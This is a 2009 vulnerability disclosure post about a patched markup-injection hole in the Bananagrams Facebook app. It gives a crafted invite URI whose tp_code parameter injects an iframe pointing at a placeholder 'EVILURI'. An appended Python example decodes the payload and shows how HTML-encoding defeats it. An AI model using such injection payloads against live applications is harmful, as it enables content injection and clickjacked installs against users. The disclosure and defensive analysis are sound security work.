FAXX Hack: Bananagrams

September 13th, 2009

Sorry for not posting yesterday – I’ll post another FAXX Hack in a bit to make up for it.

Facebook Verified Application

Current Monthly Active Users: 22,215

Current Rank on Application Leaderboard: 1,165

Application Developer: Large Animal Games

Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!

Vulnerability Status: Patched

Capable of Clickjacking Install: Yes

Example URI: http://apps.facebook.com/bananagrams/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E
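
The tp_code value in the example URI decodes to markup that closes a quoted attribute and its tag, then opens an fb:iframe element. The following is an added example, not code from the original post or from the application: it decodes the parameter and compares what an HTML parser sees when the value is echoed raw versus HTML-encoded. The template it renders into is an assumption, since the post does not show the application's markup.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Example URI exactly as given in the post (EVILURI is the post's placeholder).
EXAMPLE_URI = ("http://apps.facebook.com/bananagrams/invite.php"
               "?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E")

# Assumption: the value was echoed into a double-quoted attribute.
# Hypothetical template; the real page markup is not shown in the post.
TEMPLATE = '<input type="hidden" name="tp_code" value="{}"/>'


class TagCollector(HTMLParser):
    """Records the name of every start tag the parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def decoded_param(uri, name):
    """Return the percent-decoded value of one query parameter."""
    return parse_qs(urlsplit(uri).query)[name][0]


def render(value, encode):
    """Place the value in the template, optionally HTML-encoding it first."""
    return TEMPLATE.format(escape(value, quote=True) if encode else value)


def tags_in(markup):
    """List the elements a parser finds in the rendered markup."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    payload = decoded_param(EXAMPLE_URI, "tp_code")
    print("decoded tp_code:", payload)
    print("raw echo    ->", tags_in(render(payload, encode=False)))
    print("encoded echo->", tags_in(render(payload, encode=True)))
```

With the raw echo the parser reports a second element supplied by the request; with encoding the whole value stays inside the attribute.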
